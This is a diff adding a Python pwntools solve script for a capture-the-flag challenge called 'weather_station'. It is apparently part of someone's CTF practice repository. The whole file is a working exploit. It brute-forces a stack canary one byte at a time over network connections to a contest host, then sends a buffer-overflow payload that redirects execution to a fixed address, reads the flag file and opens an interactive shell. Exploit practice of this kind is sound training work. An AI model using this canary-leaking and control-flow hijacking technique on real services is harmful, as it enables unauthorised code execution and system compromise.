Second CTFs part

canary/06_weather_station/solve.py

@@ -0,0 +1,58 @@
+#!/usr/bin/env python3
+from pwn import *
+import time
+
+context.binary = elf = ELF('./weather_station', checksec=False)
+
+p = process(elf.path)
+
+HOST, PORT = 'offsec.m0lecon.it', 13559
+#HOST, PORT = '127.0.0.1', 5555
+OFFSET_TO_CANARY = 56
+#
+#OFFSET_TO_RIP = OFFSET_TO_CANARY + 8 + 8
+
+known = b"\x00"
+
+for i in range(7):
+    for bval in range(256):
+        guess = known + bytes([bval])
+        payload = b"A" * OFFSET_TO_CANARY + guess
+
+        io = remote(HOST, PORT, level='error')
+        io.recvuntil(b'location: ')
+        io.sendline(b"Safe")
+        io.recvuntil(b'query: ')
+        io.send(payload)
+
+        try:
+            data = io.recv(timeout=0.2)
+        except EOFError:
+            data = b""
+        io.close()
+        if b"Forecast sent!" in data:
+            known = guess
+            log.success(f"byte {i+1}: {bval:02x}")
+            break
+
+canary = u64(known)
+
+log.info(f"Canary: {canary:#x}")
+
+
+io = remote(HOST, PORT, level='error')
+io.recvuntil(b'location: ')
+io.sendline(b"Safe")
+io.recvuntil(b'query: ')
+
+payload = flat(
+    b'A' * OFFSET_TO_CANARY,
+    p64(canary),
+    b'B' * 8,
+    p64(0x000000000040101a),
+    p64(0x0000000000401530),
+)
+io.send(payload)
+print(io.recvline())
+print(io.sendline(b'cat /home/user/flag'))
+io.interactive()